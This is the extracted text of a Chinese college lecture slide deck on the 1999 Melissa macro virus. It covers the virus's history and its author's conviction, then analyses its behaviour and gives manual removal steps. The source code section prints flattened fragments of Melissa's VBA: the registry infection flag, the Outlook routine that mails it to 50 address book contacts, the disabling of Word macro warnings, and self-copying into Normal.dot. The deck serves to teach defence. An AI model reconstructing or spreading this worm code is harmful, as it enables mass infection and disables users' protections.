3-3-2梅丽莎病毒剖析.ppt

计算机病毒与防治 重庆电子工程职业学院 计算机病毒与防治课程小组 教学单元3 3宏病毒防治 梅丽莎病毒源码分析 梅丽莎病毒特点 梅丽莎病毒行为分析 第二讲梅丽莎病毒剖析 计算机病毒与防治课程小组 梅丽莎病毒的手工清除 梅丽莎病毒特点 计算机病毒与防治课程小组 病毒名称 梅丽莎 又称Macro Word97 Melissa 病毒类型 宏病毒 危险级别 影响系统Word97 Word2000 梅丽莎病毒简介 梅丽莎病毒特点 计算机病毒与防治课程小组 梅丽莎 病毒于1999年3月爆发 它伪装成一封来自朋友或同事的 重要信息 电子邮件 用户打开邮件后 病毒会让受感染的电脑向外发送50封携毒邮件 尽管这种病毒不会删除电脑系统文件 但它引发的大量电子邮件会阻塞电子邮件服务器 使之瘫痪 1999年4月1日 在美国在线的协助下 美国政府将史密斯捉拿归案 梅丽莎病毒简介 梅丽莎病毒特点 计算机病毒与防治课程小组 2002年5月7日美国联邦法院判决这个病毒的制造者入狱20个月和附加处罚 这是美国第一次对重要的电脑病毒制造者进行严厉惩罚 在联邦法庭上 控辩双方均认定 梅丽莎 病毒造成的损失超过8000万美元 编制这个病毒的史密斯承认 他从AOL盗取了一个帐户名 并利用这个帐户到处传播宏病毒 最后他表示认罪 认为设计电脑病毒是一个 巨大的错误 自己的行为 不道德 病毒制造者 梅丽莎病毒特点 计算机病毒与防治课程小组 该病毒通过电子邮件的方式传播 当用户打开附件中的 list doc 文件时 将立刻中招 病毒的代码使用Word的VBA语言编写 开创了此类病毒的先河 如同病毒作者的猖狂之言 It sanewage 病毒通过对注册表进行修改 并调用Outlook发送含有病毒的邮件 进行快速传播 由于该病毒发送的邮件的发件人是用户熟悉的 因此往往被很多人忽视 同时 该病毒会自动重复以上的动作 由此引起连锁反应 在短时间内 造成邮件服务器的大量阻塞 严重影响正常网络通讯 该病毒可感染Word97 Word2000的Doc文件 并修改通用模板Normal dot 使受害者几乎永无 脱离苦海 之时 梅丽莎病毒特点 梅丽莎病毒源码分析 计算机病毒与防治课程小组 梅丽莎病毒巧妙地利用了VBA技术对注册表 Word模板和邮件系统进行了猛烈地攻击 1 梅丽莎病毒被激活后 将修改注册表中的 HKEY CURRENT USER Software Microsoft office 键 并增加项 Melissa 赋值为 byKwyjibo 病毒作者的大名 并将此作为是否已感染病毒的标志 病毒中相关操作的核心代码如下所示 读取注册表项的内容 进行判断IfSystem PrivateProfileString HKEY CURRENT USER Software Microsoft office Melissa byKwyjibo Then 其它操作代码 设置感染标志System PrivateProfileString HKEY CURRENT USER Software Microsoft office Melissa byKwyjibo EndIf 梅丽莎病毒源码分析 计算机病毒与防治课程小组 2 发送邮件在Outlook程序启动的情况下 梅丽莎病毒将自动给地址簿中的成员 前50名 发送邮件 主题为 ImportantMessageFrom 用户名 为Word软件的用户名 邮件的正文为 Hereisthatdocumentyouaskedfor don tshowanyoneelse 一 邮件的附件为一个文件名为 list doc 的带毒文件 为了实现七述功能 病毒利用获取了地址薄中所有的邮件地址 并发送内嵌病毒代码的邮件 达到了疯狂传播的目的 病毒中相关操作的核心代码如下所示 梅丽莎病毒源码分析 计算机病毒与防治课程小组 DimUngaDasOutlook DasMapiName BreakUmoffASlice 创建Outlook应用程序实例对象SetUngaDasOutlook CreateObject Outlook Application 获取MAPI对象SetDasMapiName UngaDasOutlook GetNameSpace MAPI IfUngaDasOutlook Outlook ThenDasMapiName Logon profile password 遍历地址薄 进行邮件发送操作Fory 1ToDasMapiName AddressLists CountSetAddyBook DasMapiName AddressLists y X 1SetBreakUmoffASlice UngaDasOutlook CreateItem 0 Foroo 1ToAddyBook AddressEntries Count 获取第n个收件人地址Peep AddyBook AddressEntries x 加入收件人地址BreakUmoffASlice Recipients AddPeepX x 1 梅丽莎病毒源码分析 计算机病毒与防治课程小组 Ifx 50Thenoo AddyBook AddressEntries CountNextoo 设置邮件的主题BreakUmoffASlice Subject ImportantMessageFrom Application UserName 设置邮件的正文BreakUmoffASlice Body Hereisthatdocumentyouaskedfor don tshowanyoneelse 加入邮件的附件BreakUmoffASlice Attachments AddActiveDocument FullName 发送邮件BreakUmoffASlice SendNexty 断开连接DasMapiName LogoffPeep EndIf 梅丽莎病毒源码分析 计算机病毒与防治课程小组 3 修改Word模版梅丽莎病毒激活后 将感染Word97和Word2000的文档并修改通用模板Normal dot 使感染后的Word运行时 宏 菜单项不能使用 并且导致Word软件对文件转换 打开带有宏的文件 Normal dot遭到修改后都不会出现警告 使病毒的魔爪 天衣无缝 最后 将病毒自身的代码和所做的设置修改 利用一个很高超的方法一同写入Normal dot之中 使用户以后打开Word时病毒反复发作 病毒中相关操作的核心代码如下所示 梅丽莎病毒源码分析 计算机病毒与防治课程小组 使 宏 工具栏的 安全 项无效CommandBars Macro Controls Security Enabled False 使 工具 菜单栏的 宏 项无效CommandBars Tools Controls Macro Enabled False 将 0 1 1 值赋于ConfirmConversions属性 使 文件转换 对话框不显示Options ConfirmConversions 1 1 将 0 1 1 值赋于VirusProtection属性 使 宏警告 对话框不显示Options VirusProtection 1 1 将 0 1 1 值赋于SaveNormalPrompt属性 使Normal dot被修改后不显示警告对话框Options SaveNormalPrompt 1 1 获取当前文档的VBA工程的第1个模块名称SetADI1 ActiveDocument VBProject VBComponents Item 1 获取Normal dot的VBA工程的第1个模块名称SetNTI1 NormalTemplate VBProject VBComponents Item 1 NTCL NTI1 CodeModule CountOfLinesADCL ADI1 CodeModule CountOfLinesBGN 2 梅丽莎病毒源码分析 计算机病毒与防治课程小组 如果当前文档未感染IfADI1 Name Melissa Then 修改VBA工程的第1个模块名称为 Melissa IfADCL 0ThenADI1 CodeModule DeleteLines1 ADCLSetToInfect ADI1ADI1 Name Melissa DoAD TrueEndIf 如果Normal dot未感染IfNTI1 Name Melissa Then 修改VBA工程的第1个模块名称为 Melissa IfNTCL 0ThenNTI1 CodeModule DeleteLines1 NTCLSetToInfect NTI1NTI1 Name Melissa DoNT TrueEndIf 梅丽莎病毒源码分析 计算机病毒与防治课程小组 如果都已感染 跳转执行以后的命令IfDoNTTrueAndDoADTrueThenGoToCY 开始感染Normal dotIfDoNT TrueThenDoWhileADI1 CodeModule Lines 1 1 ADI1 CodeModule DeleteLines1LoopToInfect CodeModule AddFromString PrivateSubDocument Close DoWhileADI1 CodeModule Lines BGN 1 ToInfect CodeModule InsertLinesBGN ADI1 CodeModule Lines BGN 1 BGN BGN 1LoopEndIf 梅丽莎病毒源码分析 计算机病毒与防治课程小组 IfDoAD TrueThen 开始感染当前文档DoWhileNTI1 CodeModule Lines 1 1 NTI1 CodeModule DeleteLines1LoopToInfect CodeModule AddFromString PrivateSubDocument Open DoWhileNTI1 CodeModule Lines BGN 1 ToInfect CodeModule InsertLinesBGN NTI1 CodeModule Lines BGN 1 BGN BGN 1LoopEndIfCYA 保存被修改的当前文档和Normal dotIfNTCL0AndADCL 0And InStr 1 ActiveDocument Name Document False ThenActiveDocument SaveAsFileName ActiveDocument FullNameElseIf InStr 1 ActiveDocument Name Document False ThenActiveDocument Saved TrueEndIfEnfIf 梅丽莎病毒主要行为分析 计算机病毒与防治课程小组 梅丽莎病毒源码 梅丽莎病毒对注册表的修改 梅丽莎病毒发出的邮件 梅丽莎病毒手工清除 计算机病毒与防治课程小组 感染了梅丽莎病毒后 同样可以用最新的防治计算机病毒的软件来查杀 如果手头上一时没有病毒防治软件的话 对感染宏病毒的WORD文件也可以通过手工操作的方法来处理 1 在Administrator用户下 打开我的电脑 选择 工具 文件夹选项 查看 选中 显示系统文件夹的内容 和 显示所有文件和文件夹 选项 取消 隐藏受保护的操作系统文件 选项 确定后搜索NORMAL DOT文件 注意在搜索时要将 更多高级选项 下的 搜索系统文件夹 和 搜索隐藏的文件和文件夹 都勾上 待搜索完毕后 将找到的NORMAL DOT文件全部删除 并清空回收站 2 打开注册表编辑器 搜索所有键名称为 Melissa 的项 全部删除 熊猫烧香病毒手工